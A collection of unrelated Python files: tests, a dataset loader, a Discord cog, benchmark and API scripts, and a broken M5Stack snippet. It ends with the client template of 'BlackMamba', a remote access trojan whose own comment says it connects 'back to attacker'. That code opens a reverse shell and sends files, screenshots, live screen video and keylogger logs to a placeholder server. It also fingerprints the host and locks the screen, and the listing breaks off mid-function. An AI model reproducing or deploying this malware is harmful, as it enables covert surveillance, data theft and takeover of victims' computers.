strategy = trending_strategy_factory.get_strategy(
TrendingType.TRACKS, version
)
if strategy.use_mat_view:
strategy.update_track_score_query(session)
session.commit()
enqueue_trending_challenges(db, redis_conn, bus, trending_date)
with db.scoped_session() as session:
session.query(Challenge).filter(
or_(
Challenge.id == "trending-playlist",
Challenge.id == "trending-track",
Challenge.id == "trending-underground-track",
)
).update({"active": True, "starting_block": BLOCK_NUMBER})
bus.process_events(session)
session.flush()
trending_tracks = (
session.query(TrendingResult)
.filter(TrendingResult.type == str(TrendingType.TRACKS))
.all()
)
assert len(trending_tracks) == 5
user_trending_tracks_challenges = (
session.query(UserChallenge)
.filter(UserChallenge.challenge_id == "trending-track")
.all()
)
assert len(user_trending_tracks_challenges) == 5
ranks = {
"2021-08-20:1",
"2021-08-20:2",
"2021-08-20:3",
"2021-08-20:4",
"2021-08-20:5",
}
for challenge in user_trending_tracks_challenges:
assert challenge.specifier in ranks
ranks.remove(challenge.specifier)
trending_playlists = (
session.query(TrendingResult)
.filter(TrendingResult.type == str(TrendingType.PLAYLISTS))
.all()
)
assert len(trending_playlists) == 5
|
"""
implementation of criteo dataset
"""
# pylint: disable=unused-argument,missing-docstring
import os
import sys
import re
import random
import numpy as np
from intel_pytorch_extension import core
import inspect
# pytorch
import torch
from torch.utils.data import Dataset, RandomSampler
import os
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
#import dataset
import dlrm_data_pytorch as dp
import data_loader_terabyte
class CriteoCalib(Dataset):
def __init__(self,
data_path,
name,
test_num_workers=0,
max_ind_range=-1,
mlperf_bin_loader=False,
sub_sample_rate=0.0,
randomize="total",
memory_map=False):
super().__init__()
self.random_offsets = []
self.use_fixed_size = True
# fixed size queries
self.samples_to_aggregate = 1
if name == "kaggle":
raw_data_file = data_path + "/train.txt"
processed_data_file = data_path + "/kaggleAdDisplayChallenge_processed.npz"
elif name == "terabyte":
raw_data_file = data_path + "/day"
processed_data_file = data_path + "/terabyte_processed.npz"
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
self.use_mlperf_bin_loader = mlperf_bin_loader and memory_map and name == "terabyte"
if self.use_mlperf_bin_loader:
cal_data_file = os.path.join(data_path, 'calibration.npz')
if os.path.isfile(cal_data_file):
print("Found calibration.npz !!")
self.cal_loader = data_loader_terabyte.CalibDataLoader(
data_filename=cal_data_file,
batch_size=1,
)
else:
counts_file = raw_data_file + '_fea_count.npz'
validate_file = data_path + "/terabyte_processed_val.bin"
if os.path.exists(validate_file):
print("Found terabyte_processed_val.bin !!")
self.val_data = data_loader_terabyte.CriteoBinDataset(
data_file=validate_file,
counts_file=counts_file,
batch_size=self.samples_to_aggregate,
max_ind_range=max_ind_range
)
self.val_loader = torch.utils.data.DataLoader(
self.val_data,
batch_size=None,
batch_sampler=None,
shuffle=False,
num_workers=0,
collate_fn=None,
pin_memory=False,
drop_last=False,
)
self.cal_loader = self.val_loader
else:
self.cal_loader = None
else:
self.val_data = dp.CriteoDataset(
dataset=name,
max_ind_range=max_ind_range,
sub_sample_rate=sub_sample_rate,
randomize=randomize,
split="val",
raw_path=raw_data_file,
pro_data=processed_data_file,
memory_map=memory_map
)
self.val_loader = torch.utils.data.DataLoader(
self.val_data,
batch_size=self.samples_to_aggregate,
shuffle=False,
num_workers=test_num_workers,
collate_fn=dp.collate_wrapper_criteo,
pin_memory=False,
drop_last=False,
)
self.cal_loader = self.val_loader
def get_calibration_data_loader(self):
return self.cal_loader
|
from disnake.ext import commands
class ErrorHandler(commands.Cog):
"""A cog for global error handling."""
def __init__(self, bot: commands.Bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(
self, ctx: commands.Context, error: commands.CommandError
):
"""A global error handler cog."""
if isinstance(error, commands.CommandNotFound):
return # Return because we don't want to show an error for every command not found
elif isinstance(error, commands.CommandOnCooldown):
message = f"This command is on cooldown. Please try again after {round(error.retry_after, 1)} seconds."
elif isinstance(error, commands.MissingPermissions):
message = "You are missing the required permissions to run this command!"
elif isinstance(error, commands.UserInputError):
message = "Something about your input was wrong, please check your input and try again!"
elif isinstance(error, commands.NoPrivateMessage):
message = "This command cannot be run in a Private Message!"
else:
message = "Oh no! Something went wrong while running the command!"
await ctx.send(message)
def setup(bot: commands.Bot):
bot.add_cog(ErrorHandler(bot))
|
import matplotlib
import subprocess
import matplotlib.pyplot as plt
import numpy as np
time_gpu = {}
time_cpu = {}
generate = './generate_dataset.py'
par = './../cpp/kmean-par'
seq = './../cpp/kmean-seq'
file_input = 'points_'
for k in range(100, 510, 100):
time_cpu[k] = {}
time_gpu[k] = {}
for n in range(100000, 1000001, 200000):
filename = file_input
subprocess.call(['python3', 'generate_dataset.py', '-n', str(n), '-k', str(k), '-o', filename, '-r', '10', '-v', '20'])
output = subprocess.check_output([seq, '-o', 'res', '-i', filename, '-k', str(k)]).decode('utf8').split('\n')
time_c = int(output[-2])
output = subprocess.check_output([par, '-o', 'res', '-i', filename, '-k', str(k)]).decode('utf8').split('\n')
time_p = int(output[-2])
time_cpu[k][n] = time_c
time_gpu[k][n] = time_p
file = ""
for k in range(100, 510, 100):
for n in range(100000, 1000001, 200000):
file += "k: " + str(k) + " n: " + str(n) + " seq: " + str(time_cpu[k][n]) + " par: " + str(time_gpu[k][n]) + "\n"
f = open('results', 'w')
f.write(file)
# Scale n
x1, y1 = zip(*sorted(time_gpu[500].items()))
x2, y2 = zip(*sorted(time_cpu[500].items()))
fig, ax = plt.subplots()
print(len(time_gpu))
print(len(time_gpu[500]))
ax.plot(x1, y1)
ax.plot(x2, y2)
ax.set(xlabel='Number of data points', ylabel='Execution time')
#plt.show()
plt.savefig('scale_n.png')
# Scale k
fig, ax = plt.subplots()
new = [(k, v[500000]) for k, v in time_gpu.items()]
x, y = zip(*sorted(new))
ax.set(xlabel='Number of clusters', ylabel='Execution time')
ax.plot(x, y)
#plt.show()
plt.savefig('scale_k.png')
# heat map
m = np.zeros((6, 6))
for k, v in sorted(time_gpu.items()):
for k2, v2 in sorted(v.items()):
m[k / 100][k2 / 200000] = (1.0 * time_cpu[k][k2]) / v2
#m.append(((k, k2), v2 / (1.0 * time_cpu[k][k2])))
print(m[1:,1:])
plt.imshow(m[1:,1:], cmap='hot', interpolation='nearest')
plt.colorbar()
plt.xticks(range(0, 5), range(100, 510, 100))
plt.yticks(range(0, 5), range(100000, 1000001, 200000))
#plt.show()
plt.savefig('map.png')
# K discovery
subprocess.call(['python3', 'generate_dataset.py', '-n', '500000', '-k', '50', '-o', file_input, '-r', '10', '-v', '20'])
output = subprocess.check_output([seq, '-o', 'res', '-i', file_input, '-a', '-m', '5', '-M', '100', '-s', '2']).split('\n')
time_c = int(output[-2])
output = subprocess.check_output([par, '-o', 'res', '-i', file_input, '-a', '-m', '5', '-M', '100', '-s', '2']).split('\n')
time_p = int(output[-2])
print('speedup : ' + str(time_p / (1.0 * time_c))) |
import aspose.slides as slides
def charts_set_data_range():
#ExStart:SetDataRange
# The path to the documents directory.
outDir = "./examples/out/"
dataDir = "./examples/data/"
# Instantiate Presentation class that represents PPTX file
with slides.Presentation(dataDir + "charts_with_external_workbook.pptx") as presentation:
# Access first slideMarker and add chart with default data
slide = presentation.slides[0]
chart = slide.shapes[0]
chart.chart_data.set_range("Sheet1!A1:B4")
presentation.save(outDir + "charts_set_data_range_out.pptx", slides.export.SaveFormat.PPTX)
#ExEnd:SetDataRange |
#!/usr/bin/python3
""" ===================================================================================================================
|
| Name : roll_the_dice.py
| Project : diceware
| Copyright : burrwebb
| License : Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
| Description :
|
=================================================================================================================== """
import argparse
from diceware import Diceware
def main():
diceware = Diceware()
parser = argparse.ArgumentParser(description='Generate passphrases with Diceware!')
parser.add_argument('-l', '--length', help='Desired length of passphrase', default=6, type=int)
parser.add_argument('-n', '--num_phrases', help='Number of passphrases', default=1, type=int)
args = parser.parse_args()
length = args.length
num_phrases = args.num_phrases
list_of_phrases = diceware.generate_multiple(length_of_phrases=length, number_of_phrases=num_phrases)
print()
print("Your new passphrase(s):")
print("----------------------------")
for phrase in list_of_phrases:
print(phrase)
print()
# execute the script
if __name__ == "__main__":
main()
"""
Copyright 2019 burrwebb
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
|
"""Treadmill metrics collector.
Collects Treadmill metrics and sends them to Graphite.
"""
import glob
import logging
import os
import time
import click
from treadmill import appenv
from treadmill import exc
from treadmill import fs
from treadmill import rrdutils
from treadmill.metrics import rrd
#: Metric collection interval (every X seconds)
_METRIC_STEP_SEC_MIN = 15
_METRIC_STEP_SEC_MAX = 300
_LOGGER = logging.getLogger(__name__)
def _core_svcs(root_dir):
"""Contructs list of core services."""
return sorted([
os.path.basename(s)
for s in glob.glob(os.path.join(root_dir, 'init', '*'))
if not (s.endswith('.out') or s.endswith('.err'))])
def init():
"""Top level command handler."""
# TODO: main is too long, need to be refactored.
#
# pylint: disable=R0915
@click.command()
@click.option('--step', '-s',
type=click.IntRange(_METRIC_STEP_SEC_MIN,
_METRIC_STEP_SEC_MAX),
default=_METRIC_STEP_SEC_MIN,
help='Metrics collection frequency (sec)')
@click.option('--approot', type=click.Path(exists=True),
envvar='TREADMILL_APPROOT', required=True)
def metrics(step, approot):
"""Collect node and container metrics."""
tm_env = appenv.AppEnvironment(root=approot)
app_metrics_dir = os.path.join(tm_env.metrics_dir, 'apps')
core_metrics_dir = os.path.join(tm_env.metrics_dir, 'core')
fs.mkdir_safe(app_metrics_dir)
fs.mkdir_safe(core_metrics_dir)
interval = int(step) * 2
rrdclient = rrdutils.RRDClient('/tmp/treadmill.rrd')
# Initiate the list for monitored applications
monitored_apps = set(
os.path.basename(metric_name)[:-len('.rrd')]
for metric_name in glob.glob('%s/*' % app_metrics_dir)
if metric_name.endswith('.rrd')
)
sys_svcs = _core_svcs(approot)
sys_svcs_no_metrics = set()
sys_maj_min = '{}:{}'.format(*fs.path_to_maj_min(approot))
sys_block_dev = fs.maj_min_to_blk(*fs.path_to_maj_min(approot))
_LOGGER.info('Device %s maj:min = %s for approot: %s', sys_block_dev,
sys_maj_min, approot)
core_rrds = ['treadmill.apps.rrd',
'treadmill.core.rrd',
'treadmill.system.rrd']
for core_rrd in core_rrds:
rrdfile = os.path.join(core_metrics_dir, core_rrd)
if not os.path.exists(rrdfile):
rrdclient.create(rrdfile, step, interval)
while True:
starttime_sec = time.time()
rrd.update(
rrdclient,
os.path.join(core_metrics_dir, 'treadmill.apps.rrd'),
'treadmill/apps', sys_maj_min, sys_block_dev
)
rrd.update(
rrdclient,
os.path.join(core_metrics_dir, 'treadmill.core.rrd'),
'treadmill/core', sys_maj_min, sys_block_dev
)
rrd.update(
rrdclient,
os.path.join(core_metrics_dir, 'treadmill.system.rrd'),
'treadmill', sys_maj_min, sys_block_dev
)
count = 3
for svc in sys_svcs:
if svc in sys_svcs_no_metrics:
continue
rrdfile = os.path.join(core_metrics_dir,
'{svc}.rrd'.format(svc=svc))
if not os.path.exists(rrdfile):
rrdclient.create(rrdfile, step, interval)
svc_cgrp = os.path.join('treadmill', 'core', svc)
rrd.update(rrdclient, rrdfile, svc_cgrp, sys_maj_min,
sys_block_dev)
count += 1
seen_apps = set()
for app_dir in glob.glob('%s/*' % tm_env.apps_dir):
if not os.path.isdir(app_dir):
continue
app_unique_name = os.path.basename(app_dir)
seen_apps.add(app_unique_name)
try:
localdisk = tm_env.svc_localdisk.get(app_unique_name)
blkio_major_minor = '{major}:{minor}'.format(
major=localdisk['dev_major'],
minor=localdisk['dev_minor'],
)
block_dev = localdisk['block_dev']
except (exc.TreadmillError, IOError, OSError):
blkio_major_minor = None
block_dev = None
rrd_file = os.path.join(
app_metrics_dir, '{app}.rrd'.format(app=app_unique_name))
if not os.path.exists(rrd_file):
rrdclient.create(rrd_file, step, interval)
app_cgrp = os.path.join('treadmill', 'apps', app_unique_name)
rrd.update(rrdclient, rrd_file, app_cgrp, blkio_major_minor,
block_dev)
count += 1
for app_unique_name in monitored_apps - seen_apps:
# Removed metrics for apps that are not present anymore
rrd_file = os.path.join(
app_metrics_dir, '{app}.rrd'.format(app=app_unique_name))
_LOGGER.info('removing %r', rrd_file)
rrdclient.forget(rrd_file)
os.unlink(rrd_file)
monitored_apps = seen_apps
second_used = time.time() - starttime_sec
_LOGGER.info('Got %d cgroups metrics in %.3f seconds',
count, second_used)
if step > second_used:
time.sleep(step - second_used)
# Gracefull shutdown.
_LOGGER.info('service shutdown.')
return metrics
|
import testaid
testinfra_hosts = testaid.hosts()
def test_testaid_ruby_role_curl_install_packages_installed(host, testvars):
curl_packages = testvars['curl_packages']
for debian_package in curl_packages:
deb = host.package(debian_package)
assert deb.is_installed
|
#pylint: disable=import-error
from machine import Pin, SPI
from input import DigitalInput
import display
import m5stack
#pylint: enable=import-error
#TODO: does not handle multiple initialisations
if not 'tft' in dir():
tft = m5stack.Display()
tft.image(x, y, file [,scale, type]
|
import requests
from datetime import datetime, timedelta
def get_average_prices(currency, start_date, end_date):
""" Returns the average price per day for this currency between the two dates.
start_date and end_date must be datetime objects """
# Ex : https://poloniex.com/public?command=returnChartData¤cyPair=BTC_ETH&start=1515163043&end=1517755043&period=86400
# Period is in seconds. 86400 = 24 hours.
params = (('command', 'returnChartData'), ('currencyPair', currency), ('start', int(start_date.timestamp())), ('end', int(end_date.timestamp())), ('period', '86400'))
r = requests.post('https://poloniex.com/public', params=params)
return r.json()
def get_currencies_data(currencies_list):
colors = ["#8e5ea2", "#3e95cd", "#3cba9f", "#c45850", "#e8c3b9"]
# Currently displaying data on the last 30 days
days = 30
end_date = datetime.now()
start_date = end_date - timedelta(days=days)
times = []
times.append(start_date.strftime('%Y/%m/%d'))
for date in range(days + 1):
times.append((start_date + timedelta(days=date)).strftime('%Y/%m/%d'))
currencies_data = {}
for i, curr in enumerate(currencies_list):
get_currency_data(curr, currencies_data, colors[i % len(colors)], start_date, end_date)
return times, currencies_data
def get_currency_data(currency, currencies_data, color, start_date, end_date):
prices_json = get_average_prices(currency, start_date, end_date)
prices = []
for price in prices_json:
prices.append(price['weightedAverage'])
currencies_data[currency] = {}
currencies_data[currency]['values'] = prices
currencies_data[currency]['color'] = color
|
####################################################################################
# BLACKMAMBA BY: LOSEYS (https://github.com/loseys)
#
# QT GUI INTERFACE BY: WANDERSON M.PIMENTA (https://github.com/Wanderson-Magalhaes)
# ORIGINAL QT GUI: https://github.com/Wanderson-Magalhaes/Simple_PySide_Base
####################################################################################
"""
It is a base to create te Python file that will be executed in the client host. Some
terms of "body_script" will be replaced:
SERVER_IP
SERVER_PORT
SERVER_V_IP
CLIENT_TAG
SERVER_KEY
"""
body_script = r"""#!/usr/bin/python3
import os
import sys
import time
import random
import platform
from os import environ
environ['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'
first_execution = True
system_os = platform.platform().lower()
if 'linux' in str(platform.platform()).lower():
if not 'screen on' in str(os.popen('screen -ls')).lower():
os.environ["QT_QPA_PLATFORM"] = "offscreen"
if first_execution:
if 'linux' in system_os:
os.system(f'chmod 777 {os.path.basename(__file__)}')
os.system('pip3 install requests')
os.system('pip3 install Pillow')
os.system('pip3 install pyautogui')
os.system('pip3 install wmi')
os.system('pip3 install pytest-shutil')
os.system('pip3 install cv2')
os.system('pip3 install pynput')
os.system('pip3 install PyQt5')
os.system('pip3 install PyAutoGUI')
os.system('pip3 install cryptography')
os.system('pip3 install opencv-python')
os.system('pip3 install mss')
os.system('pip3 install pygame')
os.system('pip3 install numpy')
elif 'windows' in system_os:
os.system('pip install Pillow')
os.system('pip install requests')
os.system('pip install pyautogui')
os.system('pip install wmi')
os.system('pip install pytest-shutil')
os.system('pip install cv2')
os.system('pip install pynput')
os.system('pip install PyQt5')
os.system('pip install PyAutoGUI')
os.system('pip install cryptography')
os.system('pip install opencv-python')
os.system('pip install mss')
os.system('pip install pygame')
os.system('pip install numpy')
client_tag_nb = (random.randint(int('1' + '0' * 30), int('9' + '0' * 30)))
with open(os.path.basename(__file__), 'r') as f:
_content = f.read()
f.close()
with open(os.path.basename(__file__), 'w') as f:
_content = _content.replace('first_execution = True', 'first_execution = False')
_content = _content.replace('client_tag = 0', f'client_tag = {client_tag_nb}')
f.write(_content)
f.close()
os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)
import re
import time
import time
import uuid
import socket
import shutil
import select
import pathlib
import requests
import threading
import subprocess
import numpy as np
from mss import mss
from threading import Thread
import pygame
from zlib import compress
from cryptography.fernet import Fernet
try:
import pyautogui
except:
#print(1)
pass
try:
from pynput.keyboard import Listener
except:
pass
try:
import cv2
except:
pass
try:
from PyQt5 import QtWidgets
except:
#print(2)
pass
ip = 'SERVER_IP'
port = SERVER_PORT
port_video = SERVER_V_IP
client_tag = 0
status_strm = True
try:
pyautogui.FAILSAFE = False
except:
#print(3)
pass
try:
app = QtWidgets.QApplication(sys.argv)
screen = app.primaryScreen()
size = screen.size()
WIDTH = size.width()
HEIGHT = size.height()
except:
#print(4)
pass
def retreive_screenshot(conn):
global status_strm
with mss() as sct:
# The region to capture
rect = {'top': 0, 'left': 0, 'width': WIDTH, 'height': HEIGHT}
while True:
try:
# Capture the screen
img = sct.grab(rect)
# Tweak the compression level here (0-9)
pixels = compress(img.rgb, 6)
# Send the size of the pixels length
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
conn.send(bytes([size_len]))
# Send the actual pixels length
size_bytes = size.to_bytes(size_len, 'big')
conn.send(size_bytes)
# Send pixels
conn.sendall(pixels)
except:
# print('except_from_thread_streaming')
#print(5)
status_strm = False
break
def main(host=ip, port=port_video):
try:
global status_strm
''' connect back to attacker on port'''
sock = socket.socket()
sock.connect((host, port))
sock.send(f'{WIDTH},{HEIGHT}'.encode())
except:
#print(6)
return
try:
while status_strm:
# print('$starting_streaming')
try:
thread = Thread(target=retreive_screenshot, args=(sock,))
thread.start()
thread.join()
except:
break
except Exception as ee:
#print(7)
# print("ERR: ", e)
sock.close()
# pygame.close()
sock.close()
# pygame.close()
class Client:
def __init__(self):
self.timer_rec = False
while True:
try:
self.s = socket.socket()
self.s.connect((ip, port))
break
except Exception as exception:
#print("Exception: {}".format(type(exception).__name__))
#print("Exception message: {}".format(exception))
#print(8)
time.sleep(15)
self.tag = str(client_tag)
first_connection = True
self.initial_path = pathlib.Path(__file__).parent.absolute()
if first_connection:
os_system = str(platform.system()).lower()
# if os_system == 'windows':
fingerprint = ['system_info',
f'tag:{self.tag}',
f'python_version:{platform.python_version()}',
f'system:{platform.system()}',
f'platform:{platform.platform()}',
f'version:{platform.version()}',
f'processor:{platform.processor().replace(" ", "-").replace(",-", "-")}',
f'architecture:{platform.machine()}',
f'uname:{platform.node()}',
f'mac_version:{self.get_mac()}',
f'external_ip:{self.external_ip_addr()}',
f'local_ip:{self.local_ip()}',
f'status:off',
f'file_path:{os.path.abspath(__file__)}'
]
fingerprint = self.crypt(fingerprint, 'SERVER_KEY')
self.s.send(str(fingerprint).encode('utf-8'))
self.lock_screen_status = False
self.path_output = pathlib.Path(__file__).parent.absolute()
self.break_terminal = False
self.command_terminal = None
self.active_termial = False
self.kl_unique = False
self.stop_logging = False;
# print(f"OS => {platform.platform()}")
f = open('output.txt', 'wb')
if 'windows' in str(platform.platform()).lower():
self.proc = subprocess.Popen('cmd.exe', stderr=subprocess.STDOUT, stdin=subprocess.PIPE, stdout=f)
elif 'linux' in str(platform.platform()).lower() or 'linux' in str(platform.system()).lower():
self.proc = subprocess.Popen('/bin/bash', stderr=subprocess.STDOUT, stdin=subprocess.PIPE, stdout=f)
self.monitoring()
def call_terminal(self, command_server):
rmv_st = command_server
if command_server == '-restore':
try:
with open('output.txt', 'r') as ff:
strc = ff.read()
ff.close()
ansi_escape = re.compile(r'(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]')
output_ansi = ansi_escape.sub('', strc)
strc = output_ansi
with open('output.txt', 'wb') as ff:
ff.write(bytes(strc, encoding='utf-8'))
ff.close()
with open('output.txt', 'rb') as gotp:
content_otp = gotp.read()
try:
content_otp = content_otp.replace(b'\\x00', b'')
content_otp = content_otp.replace(b'\x00', b'')
except:
#print(9)
pass
gotp.close()
time.sleep(2)
# string_output = content_otp.encode('utf-8')
# print(f'-RESTORE {content_otp}')
return content_otp
except:
#print(10)
time.sleep(2)
string_output = 'Has not possible to recovery the last STDOUT\.n'
# string_output = content_otp.encode('utf-8')
return string_output
elif command_server == '-restart':
try:
os.execl(sys.executable, os.path.abspath(__file__), *sys.argv)
return
except:
#print(11)
string_output = '\nWas not possible to restart the .\n.'
string_output = string_output.encode('utf-8')
return string_output
command = str(command_server)
#print(f'[{command}]')
# if command == "cls":
open('output.txt', 'wb').close()
os_sys = str(platform.platform()).lower()
if 'winwdows' in os_sys:
os.system('cls')
if 'linux' in os_sys:
os.system('clear')
time.sleep(0.1)
# else:
command = command.encode('utf-8') + b'\n'
self.proc.stdin.write(command)
self.proc.stdin.flush()
time.sleep(2)
with open('output.txt', 'r') as ff:
strc = ff.read()
ff.close()
ansi_escape = re.compile(r'(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]')
output_ansi = ansi_escape.sub('', strc)
strc = output_ansi
with open('output.txt', 'wb') as ff:
ff.write(bytes(strc, encoding='utf-8'))
ff.close()
with open('output.txt', 'rb') as ff:
string_output = ff.read()
try:
string_output = string_output.replace(b'\\x00', b'')
string_output = string_output.replace(b'\x00', b'')
except:
#print(12)
pass
#print(f'to server -> {string_output}')
# string_output = string_output.encode('utf-8')
# print(string_output)
# try:
# print(string_output)
# except:
# pass
try:
check_stb = string_output[:len(rmv_st)]
if check_stb == bytes(rmv_st, encoding='utf-8'):
rmv_stb = bytes(rmv_st, encoding='utf-8') + b'\n'
#print(rmv_stb)
string_output = string_output.replace(rmv_stb, b'')
except Exception as exception:
print("Exception: {}".format(type(exception).__name__))
print("Exception message: {}".format(exception))
#print(f'final{string_output}')
return string_output
def monitoring(self):
while True:
try:
###########time.sleep(2)
# socket.settimeout(40)
#print('waiting')
self.s.settimeout(60)
string_server = self.s.recv(1024*1024).decode()
#print(f'string server -> {string_server}')
# socket.settimeout(45)
except Exception as exception:
#print("Exception: {}".format(type(exception).__name__))
#print("Exception message: {}".format(exception))
#print(13)
# caso desligue com lock ativo vvvv
self.lock_screen_status = False
##################################
self.s.close()
while True:
############time.sleep(2)
try:
self.s = socket.socket()
self.s.connect((ip, port))
os_system = str(platform.system()).lower()
# if os_system == 'windows':
fingerprint = ['system_info',
f'tag:{self.tag}',
f'python_version:{platform.python_version()}',
f'system:{platform.system()}',
f'platform:{platform.platform()}',
f'version:{platform.version()}',
f'processor:{platform.processor().replace(" ", "-").replace(",-", "-")}',
f'architecture:{platform.machine()}',
f'uname:{platform.node()}',
f'mac_version:{self.get_mac()}',
f'external_ip:{self.external_ip_addr()}',
f'local_ip:{self.local_ip()}',
f'status:off',
]
fingerprint = self.crypt(fingerprint, 'SERVER_KEY')
self.s.send(str(fingerprint).encode('utf-8'))
break
except:
#print(14)
time.sleep(15)
pass
# error aqui
time.sleep(1) ################1335
try:
rcvdData = str(string_server).replace("b'", "").replace("'", "")
except Exception as exception:
#print("Exception: {}".format(type(exception).__name__))
#print("Exception message: {}".format(exception))
#print(15)
continue
try:
rcvdData = bytes(rcvdData, encoding='utf-8')
str_content = self.decrypt(rcvdData, 'SERVER_KEY')
str_content = str(str_content).replace("b'", "").replace("'", "")
except:
#print(16)
continue
# print(f'recbido -> {str_content}')
# if not 'hello' in str(string_server) and str(string_server) != '' and str(string_server) != ' ':
if str_content != 'hello' and str_content != '' and str_content != ' ':
# print(f'S: {str_content}')
# response = self.identify(str(str_content))
response = self.identify(str_content)
# print(f'TO SERVER => -{response}')
try:
response = self.crypt(response, 'SERVER_KEY')
response = response.replace(b'b', b'%%GBITR%%')
# print('----------------')
# print(response)
# print('----------------')
# self.s.send(str(response).encode('utf-8'))
self.s.send(response)
del (string_server)
del (rcvdData)
del (str_content)
del (response)
except:
#print(17)
# 'ALERTA DE EXCEPT')
pass
# time.sleep(1)
def identify(self, command):
if '[SYSTEM_SHELL]' in command:
try:
command = command.replace('[SYSTEM_SHELL]', '')
response = self.call_terminal(command)
return response
except:
#print(18)
pass
elif '[FGET]' in command:
command = command.replace('[FGET]', '')
try:
with open(command, 'rb') as file_content:
f_ct = file_content.read()
file_content.close()
f_ct = self.crypt_file(f_ct, 'SERVER_KEY')
with open(f'{command}_tmp', 'wb') as file_cpt:
file_cpt.write(f_ct)
del (f_ct)
except:
#print(19)
content = 'An error has occurred, please try again.'
return content
try:
f = open(f'{command}_tmp', 'rb')
except:
#print(20)
content = 'An error has occurred, please try again.'
return
l = f.read(1024)
# print('Sending FGET')
time.sleep(2)
while (l):
try:
# l = self.crypt(l, 'SERVER_KEY')
# l = l.replace(b'b', b'%%GBITR%%')
# print(f'> {l}')
self.s.settimeout(5)
self.s.send(l)
except:
#print(21)
# print('except FGET')
break
l = f.read(1024)
f.close()
time.sleep(0.5)
# try:
# self.s.send(b'\\end\\')
# except:
# print('except no \\end\\')
# pass
try:
os.remove(f'{command}_tmp')
except:
#print(22)
content = 'An error has occurred, please try again.'
return content
time.sleep(5)
end_tag = '%&@end__tag@&%'
self.s.send(end_tag.encode('utf-8'))
# print('FIM')
return end_tag
elif '[FPUT]' in command:
# elif command.startwith('[FPUT]'):
command = command.replace('[FPUT]', '')
# continue
try:
for e in range(20):
self.s.settimeout(0.5)
clear_buff = self.s.recv(1024 * 1024 * 1024)
# 'buffer cleaned FGET')
except:
#print(22)
pass
try:
f = open(f'{command}', 'wb')
self.s.settimeout(25)
l = self.s.recv(1024)
# l = str(c.recv(1024))
# l = l.replace('b"', '')
# l = l.replace("b'", '')
# l = l.replace('"', '')
# l = l.replace("'", '')
# l = l.replace('%%GBITR%%', 'b')
# l = bytes(l, encoding='utf-8')
while (l):
# print(f'FRAGMENTO {l}')
# print(f'writing => {l}')
if '%@end_tag@%' in l.decode('utf-8'):
# print('a casa caiu')
break
f.write(l)
l = self.s.recv(1024 * 1024)
# l = str(c.recv(1024))
# l = l.replace('b"', '')
# l = l.replace("b'", '')
# l = l.replace('"', '')
# l = l.replace("'", '')
# l = l.replace('%%GBITR%%', 'b')
# l = bytes(l, encoding='utf-8')
f.close()
# print('FIM ARQUIVO\n\n\n')
with open(f'{command}', 'rb') as a:
b = a.read()
try:
b = self.decrypt(b, 'SERVER_KEY')
with open(f'{command}', 'wb') as c:
c.write(b)
except:
#print(24)
pass
except:
#print(25)
pass
elif '[@%WEBGET%@]' in command:
try:
with open('tmp_call', 'w') as tmpc:
tmpc.write(command)
except:
#print(26)
time.sleep(2)
return
thread_strmg = threading.Thread(target=self.webget_file, args=())
thread_strmg.daemon = True
thread_strmg.start()
time.sleep(2)
return
elif '[@%WEBRAW%@]' in command:
try:
with open('tmp_call', 'w') as tmpc:
tmpc.write(command)
except:
#print(27)
time.sleep(2)
return
thread_strmg = threading.Thread(target=self.webraw_file, args=())
thread_strmg.daemon = True
thread_strmg.start()
time.sleep(2)
return
elif '%get-screenshot%' in command:
# elif command.startwith('%get-screenshot%'):
try:
image = pyautogui.screenshot()
except:
#print(28)
return
image.save(f'screeenshot_{self.tag}.png')
time.sleep(0.2)
with open(f'screeenshot_{self.tag}.png', 'rb') as f:
content_image = f.read()
f.close()
# os.remove(f'screeenshot_{self.tag}.png')
with open(f'screeenshot_crypt_{self.tag}.png', 'wb') as f:
f.write(self.crypt_file(content_image, 'SERVER_KEY'))
f.close()
f = open(f'screeenshot_crypt_{self.tag}.png', 'rb')
# f = open(f'screeenshot_{self.tag}.png', 'rb')
l = f.read(1024)
# print('Sending PNG')
while (l):
# print(">>>", l)
try:
self.s.send(l)
except:
#print(29)
# print("break conexao");
break
l = f.read(1024)
f.close()
time.sleep(2)
try:
self.s.send(b'\\@%end%@\\')
except:
#print(30)
pass
try:
os.remove(f'screeenshot_{self.tag}.png')
os.remove(f'screeenshot_crypt_{self.tag}.png')
except:
#print(31)
pass
return
elif '%lock-screen%' in command:
# elif command.startwith('%lock-screen%'):
threadd = threading.Thread(target=self.lock_screen, args=())
threadd.daemon = True
threadd.start()
time.sleep(2)
return
elif '%unlock-screen%' in command:
# elif command.startwith('%unlock-screen%'):
self.lock_screen_status = False
time.sleep(2)
return
elif '%sv-init-live-video%' in command:
# elif command.startwith('%sv-init-live-video%'):
thread_strmg = threading.Thread(target=self.start_streaming, args=())
thread_strmg.daemon = True
thread_strmg.start()
elif '%start-kl-function%' in command:
# print(self.stop_logging, self.kl_unique)
if self.kl_unique:
return
else:
self.kl_unique = True
thread = threading.Thread(target=self.kl_main, args=())
thread.daemon = True
thread.start()
time.sleep(2)
return
elif '%stop-kl-function%' in command:
self.stop_logging = True
self.kl_unique = False
time.sleep(2)
return
elif '%print-kl-function%' in command:
try:
with open('kl_log.txt', 'r') as get_kll:
log_string = get_kll.read()
get_kll.close()
time.sleep(2)
return f'[@%HOST_SHELL%@]{log_string}'
except:
#print(32)
response = '\nHas not possible to open the keylogger log.\n'
time.sleep(2)
return response
elif '@%list-softwares%@' in command:
if 'windows' in str(platform.platform()).lower():
try:
data = subprocess.check_output(['wmic', 'product', 'get', 'name'])
data_str = str(data)
cont_tmp = []
cont_lst = f'[@%HOST_SHELL%@]'
except:
#print(33)
return
